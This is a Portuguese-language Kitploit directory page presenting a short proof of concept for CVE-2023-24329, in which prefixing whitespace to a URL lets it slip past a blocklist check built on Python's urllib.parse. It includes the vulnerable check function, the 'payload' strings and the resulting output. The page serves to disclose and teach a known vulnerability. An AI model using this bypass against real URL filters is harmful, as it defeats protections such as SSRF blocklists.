Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-24329-Exploit — Prova de conceito demonstrando uma bypass na análise de URLs no urllib.parse do Python (CVE-2023-24329) que permite contornar listas de bloqueio ao prefixar espaços. | Kitploit
Ferramentas/GitHubGitHub/pentestmano/cve-2023-24329-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubpentestmano/cve-2023-24329-exploit

CVE-2023-24329-Exploit

Prova de conceito demonstrando uma bypass na análise de URLs no urllib.parse do Python (CVE-2023-24329) que permite contornar listas de bloqueio ao prefixar espaços.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Introdução

As funções de análise de URL focam em dividir uma string de URL em seus componentes, ou em combinar componentes de URL em uma string de URL.

  • urllib.parse.urlparse

Simplesmente urllib.parse usado para analisar urls, podemos contorná-lo adicionando espaços em branco antes da url. Isso acontece no python 3.11.4 e anteriores.

PoC

Vamos detalhar o example.py

Aqui está um conjunto de sites que você não deve acessar:

root@kitploit:~
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

Esta função verifica se o site está na lista de bloqueio ou não, se estiver na lista de bloqueio deve retornar URL Blocked

root@kitploit:~
def is_url_blocked(url):
    parse = urllib.parse.urlparse(url).geturl()
    if  parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'

Agora adicionei duas urls e verifico se alguma delas está bloqueada e não pode ser acessada:

root@kitploit:~
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)

payload1 é onde contornei is_url_blocked() porque adicionar um espaço longo antes da url contornará urllib.parse.urlparse(url).geturl() e não será executado como esperado. É por isso que a saída é

root@kitploit:~
Bypassed

Mas em payload2 obtemos

root@kitploit:~
URL Blocked

Suporte

Se você gostaria de me apoiar com uma doação, recomendo que a dê a alguém que realmente precise, por favor. Se você fizer isso, considere que ganhei seu apoio.

Buy Me A Coffee

Baixar ferramenta